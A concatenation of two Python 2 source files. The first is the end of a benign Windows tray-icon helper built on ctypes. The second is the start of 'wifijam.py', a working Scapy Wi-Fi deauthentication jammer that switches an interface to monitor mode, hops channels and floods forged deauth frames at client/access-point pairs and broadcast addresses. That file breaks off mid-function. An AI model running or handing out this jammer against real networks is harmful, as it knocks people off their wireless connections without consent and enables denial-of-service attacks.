InsertMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR]
AppendMenu = ctypes.windll.user32.AppendMenuW
AppendMenu.restype = ctypes.wintypes.BOOL
AppendMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR]
SetMenuDefaultItem = ctypes.windll.user32.SetMenuDefaultItem
SetMenuDefaultItem.restype = ctypes.wintypes.BOOL
SetMenuDefaultItem.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT]
class POINT(ctypes.Structure):
_fields_ = [ ('x', ctypes.wintypes.LONG),
('y', ctypes.wintypes.LONG)]
GetCursorPos = ctypes.windll.user32.GetCursorPos
GetCursorPos.argtypes = [ctypes.POINTER(POINT)]
SetForegroundWindow = ctypes.windll.user32.SetForegroundWindow
SetForegroundWindow.argtypes = [ctypes.wintypes.HWND]
TPM_LEFTALIGN = 0x0
TPM_CENTERALIGN = 0x4
TPM_RIGHTALIGN = 0x8
TPM_TOPALIGN = 0x0
TPM_VCENTERALIGN = 0x10
TPM_BOTTOMALIGN = 0x20
TPM_NONOTIFY = 0x80
TPM_RETURNCMD = 0x100
TPM_LEFTBUTTON = 0x0
TPM_RIGHTBUTTON = 0x2
TPM_HORNEGANIMATION = 0x800
TPM_HORPOSANIMATION = 0x400
TPM_NOANIMATION = 0x4000
TPM_VERNEGANIMATION = 0x2000
TPM_VERPOSANIMATION = 0x1000
TrackPopupMenu = ctypes.windll.user32.TrackPopupMenu
TrackPopupMenu.restype = ctypes.wintypes.BOOL
TrackPopupMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_void_p]
PostMessage = ctypes.windll.user32.PostMessageW
PostMessage.restype = ctypes.wintypes.BOOL
PostMessage.argtypes = [ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM]
DestroyMenu = ctypes.windll.user32.DestroyMenu
DestroyMenu.restype = ctypes.wintypes.BOOL
DestroyMenu.argtypes = [ctypes.wintypes.HMENU]
# Create notification icon
GUID = ctypes.c_ubyte * 16
class TimeoutVersionUnion(ctypes.Union):
_fields_ = [('uTimeout', ctypes.wintypes.UINT),
('uVersion', ctypes.wintypes.UINT),]
NIS_HIDDEN = 0x1
NIS_SHAREDICON = 0x2
class NOTIFYICONDATA(ctypes.Structure):
def __init__(self, *args, **kwargs):
super(NOTIFYICONDATA, self).__init__(*args, **kwargs)
self.cbSize = ctypes.sizeof(self)
_fields_ = [
('cbSize', ctypes.wintypes.DWORD),
('hWnd', ctypes.wintypes.HWND),
('uID', ctypes.wintypes.UINT),
('uFlags', ctypes.wintypes.UINT),
('uCallbackMessage', ctypes.wintypes.UINT),
('hIcon', ctypes.wintypes.HICON),
('szTip', ctypes.wintypes.WCHAR * 64),
('dwState', ctypes.wintypes.DWORD),
('dwStateMask', ctypes.wintypes.DWORD),
('szInfo', ctypes.wintypes.WCHAR * 256),
('union', TimeoutVersionUnion),
('szInfoTitle', ctypes.wintypes.WCHAR * 64),
('dwInfoFlags', ctypes.wintypes.DWORD),
('guidItem', GUID),
('hBalloonIcon', ctypes.wintypes.HICON),
]
NIM_ADD = 0
NIM_MODIFY = 1
NIM_DELETE = 2
NIM_SETFOCUS = 3
NIM_SETVERSION = 4
NIF_MESSAGE = 1
NIF_ICON = 2
NIF_TIP = 4
NIF_STATE = 8
NIF_INFO = 16
NIF_GUID = 32
NIF_REALTIME = 64
NIF_SHOWTIP = 128
NIIF_NONE = 0
NIIF_INFO = 1
NIIF_WARNING = 2
NIIF_ERROR = 3
NIIF_USER = 4
NOTIFYICON_VERSION = 3
NOTIFYICON_VERSION_4 = 4
Shell_NotifyIcon = ctypes.windll.shell32.Shell_NotifyIconW
Shell_NotifyIcon.restype = ctypes.wintypes.BOOL
Shell_NotifyIcon.argtypes = [ctypes.wintypes.DWORD, ctypes.POINTER(NOTIFYICONDATA)]
# Load icon/image
IMAGE_BITMAP = 0
IMAGE_ICON = 1
IMAGE_CURSOR = 2
LR_CREATEDIBSECTION = 0x00002000
LR_DEFAULTCOLOR = 0x00000000
LR_DEFAULTSIZE = 0x00000040
LR_LOADFROMFILE = 0x00000010
LR_LOADMAP3DCOLORS = 0x00001000
LR_LOADTRANSPARENT = 0x00000020
LR_MONOCHROME = 0x00000001
LR_SHARED = 0x00008000
LR_VGACOLOR = 0x00000080
OIC_SAMPLE = 32512
OIC_HAND = 32513
OIC_QUES = 32514
OIC_BANG = 32515
OIC_NOTE = 32516
OIC_WINLOGO = 32517
OIC_WARNING = OIC_BANG
OIC_ERROR = OIC_HAND
OIC_INFORMATION = OIC_NOTE
LoadImage = ctypes.windll.user32.LoadImageW
LoadImage.restype = ctypes.wintypes.HANDLE
LoadImage.argtypes = [ctypes.wintypes.HINSTANCE, ctypes.wintypes.LPCWSTR, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.wintypes.UINT]
# CreateWindow call
WNDPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM)
DefWindowProc = ctypes.windll.user32.DefWindowProcW
DefWindowProc.restype = ctypes.c_int
DefWindowProc.argtypes = [ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM]
WS_OVERLAPPED = 0x00000000L
WS_POPUP = 0x80000000L
WS_CHILD = 0x40000000L
WS_MINIMIZE = 0x20000000L
WS_VISIBLE = 0x10000000L
WS_DISABLED = 0x08000000L
WS_CLIPSIBLINGS = 0x04000000L
WS_CLIPCHILDREN = 0x02000000L
WS_MAXIMIZE = 0x01000000L
WS_CAPTION = 0x00C00000L
WS_BORDER = 0x00800000L
WS_DLGFRAME = 0x00400000L
WS_VSCROLL = 0x00200000L
WS_HSCROLL = 0x00100000L
WS_SYSMENU = 0x00080000L
WS_THICKFRAME = 0x00040000L
WS_GROUP = 0x00020000L
WS_TABSTOP = 0x00010000L
WS_MINIMIZEBOX = 0x00020000L
WS_MAXIMIZEBOX = 0x00010000L
WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED |
WS_CAPTION |
WS_SYSMENU |
WS_THICKFRAME |
WS_MINIMIZEBOX |
WS_MAXIMIZEBOX)
SM_XVIRTUALSCREEN = 76
SM_YVIRTUALSCREEN = 77
SM_CXVIRTUALSCREEN = 78
SM_CYVIRTUALSCREEN = 79
SM_CMONITORS = 80
SM_SAMEDISPLAYFORMAT = 81
WM_NULL = 0x0000
WM_CREATE = 0x0001
WM_DESTROY = 0x0002
WM_MOVE = 0x0003
WM_SIZE = 0x0005
WM_ACTIVATE = 0x0006
WM_SETFOCUS = 0x0007
WM_KILLFOCUS = 0x0008
WM_ENABLE = 0x000A
WM_SETREDRAW = 0x000B
WM_SETTEXT = 0x000C
WM_GETTEXT = 0x000D
WM_GETTEXTLENGTH = 0x000E
WM_PAINT = 0x000F
WM_CLOSE = 0x0010
WM_QUERYENDSESSION = 0x0011
WM_QUIT = 0x0012
WM_QUERYOPEN = 0x0013
WM_ERASEBKGND = 0x0014
WM_SYSCOLORCHANGE = 0x0015
WM_ENDSESSION = 0x0016
WM_SHOWWINDOW = 0x0018
WM_CTLCOLOR = 0x0019
WM_WININICHANGE = 0x001A
WM_SETTINGCHANGE = 0x001A
WM_DEVMODECHANGE = 0x001B
WM_ACTIVATEAPP = 0x001C
WM_FONTCHANGE = 0x001D
WM_TIMECHANGE = 0x001E
WM_CANCELMODE = 0x001F
WM_SETCURSOR = 0x0020
WM_MOUSEACTIVATE = 0x0021
WM_CHILDACTIVATE = 0x0022
WM_QUEUESYNC = 0x0023
WM_GETMINMAXINFO = 0x0024
WM_PAINTICON = 0x0026
WM_ICONERASEBKGND = 0x0027
WM_NEXTDLGCTL = 0x0028
WM_SPOOLERSTATUS = 0x002A
WM_DRAWITEM = 0x002B
WM_MEASUREITEM = 0x002C
WM_DELETEITEM = 0x002D
WM_VKEYTOITEM = 0x002E
WM_CHARTOITEM = 0x002F
WM_SETFONT = 0x0030
WM_GETFONT = 0x0031
WM_SETHOTKEY = 0x0032
WM_GETHOTKEY = 0x0033
WM_QUERYDRAGICON = 0x0037
WM_COMPAREITEM = 0x0039
WM_GETOBJECT = 0x003D
WM_COMPACTING = 0x0041
WM_COMMNOTIFY = 0x0044
WM_WINDOWPOSCHANGING = 0x0046
WM_WINDOWPOSCHANGED = 0x0047
WM_POWER = 0x0048
WM_COPYDATA = 0x004A
WM_CANCELJOURNAL = 0x004B
WM_NOTIFY = 0x004E
WM_INPUTLANGCHANGEREQUEST = 0x0050
WM_INPUTLANGCHANGE = 0x0051
WM_TCARD = 0x0052
WM_HELP = 0x0053
WM_USERCHANGED = 0x0054
WM_NOTIFYFORMAT = 0x0055
WM_CONTEXTMENU = 0x007B
WM_STYLECHANGING = 0x007C
WM_STYLECHANGED = 0x007D
WM_DISPLAYCHANGE = 0x007E
WM_GETICON = 0x007F
WM_SETICON = 0x0080
WM_NCCREATE = 0x0081
WM_NCDESTROY = 0x0082
WM_NCCALCSIZE = 0x0083
WM_NCHITTEST = 0x0084
WM_NCPAINT = 0x0085
WM_NCACTIVATE = 0x0086
WM_GETDLGCODE = 0x0087
WM_SYNCPAINT = 0x0088
WM_NCMOUSEMOVE = 0x00A0
WM_NCLBUTTONDOWN = 0x00A1
WM_NCLBUTTONUP = 0x00A2
WM_NCLBUTTONDBLCLK = 0x00A3
WM_NCRBUTTONDOWN = 0x00A4
WM_NCRBUTTONUP = 0x00A5
WM_NCRBUTTONDBLCLK = 0x00A6
WM_NCMBUTTONDOWN = 0x00A7
WM_NCMBUTTONUP = 0x00A8
WM_NCMBUTTONDBLCLK = 0x00A9
WM_KEYDOWN = 0x0100
WM_KEYUP = 0x0101
WM_CHAR = 0x0102
WM_DEADCHAR = 0x0103
WM_SYSKEYDOWN = 0x0104
WM_SYSKEYUP = 0x0105
WM_SYSCHAR = 0x0106
WM_SYSDEADCHAR = 0x0107
WM_KEYLAST = 0x0108
WM_IME_STARTCOMPOSITION = 0x010D
WM_IME_ENDCOMPOSITION = 0x010E
WM_IME_COMPOSITION = 0x010F
WM_IME_KEYLAST = 0x010F
WM_INITDIALOG = 0x0110
WM_COMMAND = 0x0111
WM_SYSCOMMAND = 0x0112
WM_TIMER = 0x0113
WM_HSCROLL = 0x0114
WM_VSCROLL = 0x0115
WM_INITMENU = 0x0116
WM_INITMENUPOPUP = 0x0117
WM_MENUSELECT = 0x011F
WM_MENUCHAR = 0x0120
WM_ENTERIDLE = 0x0121
WM_MENURBUTTONUP = 0x0122
WM_MENUDRAG = 0x0123
WM_MENUGETOBJECT = 0x0124
WM_UNINITMENUPOPUP = 0x0125
WM_MENUCOMMAND = 0x0126
WM_CTLCOLORMSGBOX = 0x0132
WM_CTLCOLOREDIT = 0x0133
WM_CTLCOLORLISTBOX = 0x0134
WM_CTLCOLORBTN = 0x0135
WM_CTLCOLORDLG = 0x0136
WM_CTLCOLORSCROLLBAR = 0x0137
WM_CTLCOLORSTATIC = 0x0138
WM_MOUSEMOVE = 0x0200
WM_LBUTTONDOWN = 0x0201
WM_LBUTTONUP = 0x0202
WM_LBUTTONDBLCLK = 0x0203
WM_RBUTTONDOWN = 0x0204
WM_RBUTTONUP = 0x0205
WM_RBUTTONDBLCLK = 0x0206
WM_MBUTTONDOWN = 0x0207
WM_MBUTTONUP = 0x0208
WM_MBUTTONDBLCLK = 0x0209
WM_MOUSEWHEEL = 0x020A
WM_PARENTNOTIFY = 0x0210
WM_ENTERMENULOOP = 0x0211
WM_EXITMENULOOP = 0x0212
WM_NEXTMENU = 0x0213
WM_SIZING = 0x0214
WM_CAPTURECHANGED = 0x0215
WM_MOVING = 0x0216
WM_DEVICECHANGE = 0x0219
WM_MDICREATE = 0x0220
WM_MDIDESTROY = 0x0221
WM_MDIACTIVATE = 0x0222
WM_MDIRESTORE = 0x0223
WM_MDINEXT = 0x0224
WM_MDIMAXIMIZE = 0x0225
WM_MDITILE = 0x0226
WM_MDICASCADE = 0x0227
WM_MDIICONARRANGE = 0x0228
WM_MDIGETACTIVE = 0x0229
WM_MDISETMENU = 0x0230
WM_ENTERSIZEMOVE = 0x0231
WM_EXITSIZEMOVE = 0x0232
WM_DROPFILES = 0x0233
WM_MDIREFRESHMENU = 0x0234
WM_IME_SETCONTEXT = 0x0281
WM_IME_NOTIFY = 0x0282
WM_IME_CONTROL = 0x0283
WM_IME_COMPOSITIONFULL = 0x0284
WM_IME_SELECT = 0x0285
WM_IME_CHAR = 0x0286
WM_IME_REQUEST = 0x0288
WM_IME_KEYDOWN = 0x0290
WM_IME_KEYUP = 0x0291
WM_MOUSEHOVER = 0x02A1
WM_MOUSELEAVE = 0x02A3
WM_CUT = 0x0300
WM_COPY = 0x0301
WM_PASTE = 0x0302
WM_CLEAR = 0x0303
WM_UNDO = 0x0304
WM_RENDERFORMAT = 0x0305
WM_RENDERALLFORMATS = 0x0306
WM_DESTROYCLIPBOARD = 0x0307
WM_DRAWCLIPBOARD = 0x0308
WM_PAINTCLIPBOARD = 0x0309
WM_VSCROLLCLIPBOARD = 0x030A
WM_SIZECLIPBOARD = 0x030B
WM_ASKCBFORMATNAME = 0x030C
WM_CHANGECBCHAIN = 0x030D
WM_HSCROLLCLIPBOARD = 0x030E
WM_QUERYNEWPALETTE = 0x030F
WM_PALETTEISCHANGING = 0x0310
WM_PALETTECHANGED = 0x0311
WM_HOTKEY = 0x0312
WM_PRINT = 0x0317
WM_PRINTCLIENT = 0x0318
WM_HANDHELDFIRST = 0x0358
WM_HANDHELDLAST = 0x035F
WM_AFXFIRST = 0x0360
WM_AFXLAST = 0x037F
WM_PENWINFIRST = 0x0380
WM_PENWINLAST = 0x038F
WM_APP = 0x8000
WM_USER = 0x0400
WM_REFLECT = WM_USER + 0x1c00
class WNDCLASSEX(ctypes.Structure):
def __init__(self, *args, **kwargs):
super(WNDCLASSEX, self).__init__(*args, **kwargs)
self.cbSize = ctypes.sizeof(self)
_fields_ = [("cbSize", ctypes.c_uint),
("style", ctypes.c_uint),
("lpfnWndProc", WNDPROC),
("cbClsExtra", ctypes.c_int),
("cbWndExtra", ctypes.c_int),
("hInstance", ctypes.wintypes.HANDLE),
("hIcon", ctypes.wintypes.HANDLE),
("hCursor", ctypes.wintypes.HANDLE),
("hBrush", ctypes.wintypes.HANDLE),
("lpszMenuName", ctypes.wintypes.LPCWSTR),
("lpszClassName", ctypes.wintypes.LPCWSTR),
("hIconSm", ctypes.wintypes.HANDLE)]
ShowWindow = ctypes.windll.user32.ShowWindow
ShowWindow.argtypes = [ctypes.wintypes.HWND, ctypes.c_int]
def GenerateDummyWindow(callback, uid):
newclass = WNDCLASSEX()
newclass.lpfnWndProc = callback
newclass.lpszClassName = uid.replace("-", "")
ATOM = ctypes.windll.user32.RegisterClassExW(ctypes.byref(newclass))
hwnd = ctypes.windll.user32.CreateWindowExW(0, newclass.lpszClassName, None, WS_POPUP, 0, 0, 0, 0, 0, 0, 0, 0)
return hwnd
# Message loop calls
TIMERCALLBACK = ctypes.WINFUNCTYPE(None,
ctypes.wintypes.HWND,
ctypes.wintypes.UINT,
ctypes.POINTER(ctypes.wintypes.UINT),
ctypes.wintypes.DWORD)
SetTimer = ctypes.windll.user32.SetTimer
SetTimer.restype = ctypes.POINTER(ctypes.wintypes.UINT)
SetTimer.argtypes = [ctypes.wintypes.HWND,
ctypes.POINTER(ctypes.wintypes.UINT),
ctypes.wintypes.UINT,
TIMERCALLBACK]
KillTimer = ctypes.windll.user32.KillTimer
KillTimer.restype = ctypes.wintypes.BOOL
KillTimer.argtypes = [ctypes.wintypes.HWND,
ctypes.POINTER(ctypes.wintypes.UINT)]
class MSG(ctypes.Structure):
_fields_ = [ ('HWND', ctypes.wintypes.HWND),
('message', ctypes.wintypes.UINT),
('wParam', ctypes.wintypes.WPARAM),
('lParam', ctypes.wintypes.LPARAM),
('time', ctypes.wintypes.DWORD),
('pt', POINT)]
GetMessage = ctypes.windll.user32.GetMessageW
GetMessage.restype = ctypes.wintypes.BOOL
GetMessage.argtypes = [ctypes.POINTER(MSG), ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.UINT]
TranslateMessage = ctypes.windll.user32.TranslateMessage
TranslateMessage.restype = ctypes.wintypes.ULONG
TranslateMessage.argtypes = [ctypes.POINTER(MSG)]
DispatchMessage = ctypes.windll.user32.DispatchMessageW
DispatchMessage.restype = ctypes.wintypes.ULONG
DispatchMessage.argtypes = [ctypes.POINTER(MSG)]
def LoadIcon(iconfilename, small=False):
return LoadImage(0,
unicode(iconfilename),
IMAGE_ICON,
16 if small else 0,
16 if small else 0,
LR_LOADFROMFILE)
class NotificationIcon(object):
def __init__(self, iconfilename, tooltip=None):
assert os.path.isfile(unicode(iconfilename)), "{} doesn't exist".format(iconfilename)
self._iconfile = unicode(iconfilename)
self._hicon = LoadIcon(self._iconfile, True)
assert self._hicon, "Failed to load {}".format(iconfilename)
#self._pumpqueue = Queue.Queue()
self._die = False
self._timerid = None
self._uid = uuid.uuid4()
self._tooltip = unicode(tooltip) if tooltip else u''
#self._thread = threading.Thread(target=self._run)
#self._thread.start()
self._info_bubble = None
self.items = []
def _bubble(self, iconinfo):
if self._info_bubble:
info_bubble = self._info_bubble
self._info_bubble = None
message = unicode(self._info_bubble)
iconinfo.uFlags |= NIF_INFO
iconinfo.szInfo = message
iconinfo.szInfoTitle = message
iconinfo.dwInfoFlags = NIIF_INFO
iconinfo.union.uTimeout = 10000
Shell_NotifyIcon(NIM_MODIFY, ctypes.pointer(iconinfo))
def _run(self):
self.WM_TASKBARCREATED = ctypes.windll.user32.RegisterWindowMessageW(u'TaskbarCreated')
self._windowproc = WNDPROC(self._callback)
self._hwnd = GenerateDummyWindow(self._windowproc, str(self._uid))
iconinfo = NOTIFYICONDATA()
iconinfo.hWnd = self._hwnd
iconinfo.uID = 100
iconinfo.uFlags = NIF_ICON | NIF_SHOWTIP | NIF_MESSAGE | (NIF_TIP if self._tooltip else 0)
iconinfo.uCallbackMessage = WM_MENUCOMMAND
iconinfo.hIcon = self._hicon
iconinfo.szTip = self._tooltip
Shell_NotifyIcon(NIM_ADD, ctypes.pointer(iconinfo))
self.iconinfo = iconinfo
PostMessage(self._hwnd, WM_NULL, 0, 0)
message = MSG()
last_time = -1
ret = None
while not self._die:
try:
ret = GetMessage(ctypes.pointer(message), 0, 0, 0)
TranslateMessage(ctypes.pointer(message))
DispatchMessage(ctypes.pointer(message))
except Exception, err:
# print "NotificationIcon error", err, message
message = MSG()
time.sleep(0.125)
print "Icon thread stopped, removing icon..."
Shell_NotifyIcon(NIM_DELETE, ctypes.cast(ctypes.pointer(iconinfo), ctypes.POINTER(NOTIFYICONDATA)))
ctypes.windll.user32.DestroyWindow(self._hwnd)
ctypes.windll.user32.DestroyIcon(self._hicon)
def _menu(self):
if not hasattr(self, 'items'):
return
menu = CreatePopupMenu()
func = None
try:
iidx = 1000
defaultitem = -1
item_map = {}
for fs in self.items:
iidx += 1
if isinstance(fs, basestring):
if fs and not fs.strip('-_='):
AppendMenu(menu, MF_SEPARATOR, iidx, fs)
else:
AppendMenu(menu, MF_STRING | MF_GRAYED, iidx, fs)
elif isinstance(fs, tuple):
if callable(fs[0]):
itemstring = fs[0]()
else:
itemstring = unicode(fs[0])
flags = MF_STRING
if itemstring.startswith("!"):
itemstring = itemstring[1:]
defaultitem = iidx
if itemstring.startswith("+"):
itemstring = itemstring[1:]
flags = flags | MF_CHECKED
itemcallable = fs[1]
item_map[iidx] = itemcallable
if itemcallable is False:
flags = flags | MF_DISABLED
elif not callable(itemcallable):
flags = flags | MF_GRAYED
AppendMenu(menu, flags, iidx, itemstring)
if defaultitem != -1:
SetMenuDefaultItem(menu, defaultitem, 0)
pos = POINT()
GetCursorPos(ctypes.pointer(pos))
PostMessage(self._hwnd, WM_NULL, 0, 0)
SetForegroundWindow(self._hwnd)
ti = TrackPopupMenu(menu, TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, pos.x, pos.y, 0, self._hwnd, None)
if ti in item_map:
func = item_map[ti]
PostMessage(self._hwnd, WM_NULL, 0, 0)
finally:
DestroyMenu(menu)
if func: func()
def clicked(self):
self._menu()
def _callback(self, hWnd, msg, wParam, lParam):
# Check if the main thread is still alive
if msg == WM_TIMER:
if not any(thread.getName() == 'MainThread' and thread.isAlive()
for thread in threading.enumerate()):
self._die = True
elif msg == WM_MENUCOMMAND and lParam == WM_LBUTTONUP:
self.clicked()
elif msg == WM_MENUCOMMAND and lParam == WM_RBUTTONUP:
self._menu()
elif msg == self.WM_TASKBARCREATED: # Explorer restarted, add the icon again.
Shell_NotifyIcon(NIM_ADD, ctypes.pointer(self.iconinfo))
else:
return DefWindowProc(hWnd, msg, wParam, lParam)
return 1
def die(self):
self._die = True
PostMessage(self._hwnd, WM_NULL, 0, 0)
time.sleep(0.2)
try:
Shell_NotifyIcon(NIM_DELETE, self.iconinfo)
except Exception, err:
print "Icon remove error", err
ctypes.windll.user32.DestroyWindow(self._hwnd)
ctypes.windll.user32.DestroyIcon(self._hicon)
def pump(self):
try:
while not self._pumpqueue.empty():
callable = self._pumpqueue.get(False)
callable()
except Queue.Empty:
pass
def announce(self, text):
self._info_bubble = text
def hideConsole():
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
def showConsole():
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
if __name__ == "__main__":
import time
def greet():
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
print "Hello"
def quit():
ni._die = True
def announce():
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
ni.announce("Hello there")
def clicked():
ni.announce("Hello")
def dynamicTitle():
return "!The time is: %s" % time.time()
ni = NotificationIcon(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../trayicon.ico'), "ZeroNet 0.2.9")
ni.items = [
(dynamicTitle, False),
('Hello', greet),
('Title', False),
('!Default', greet),
('+Popup bubble', announce),
'Nothing',
'--',
('Quit', quit)
]
ni.clicked = clicked
import atexit
@atexit.register
def goodbye():
print "You are now leaving the Python sector."
ni._run() |
wifijam.py | #!/usr/bin/env python
# -*- UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
nargs='*',
default=[],
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. \
Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
nargs='*',
default=[],
help="Enter the SSID or MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
#########################################
# Begin interface info and manipulation #
#########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
mon_mode = start_mon_mode(interface)
return mon_mode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Not an empty string
if line[0] != ' ': # Does not start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Not wired
iface = line[:line.find(' ')] # interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode ON '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode OFF '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
#http://stackoverflow.com/questions/159137/getting-mac-address
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
##########################################
# End of interface info and manipulation #
##########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. Afterwards, it's full blast.
'''
global mon_channel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
mon_channel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
mon_channel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', mon_channel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, mon_channel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(mon_channel)
def deauth(mon_channel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == mon_channel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == mon_channel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, mon_channel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+mon_channel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
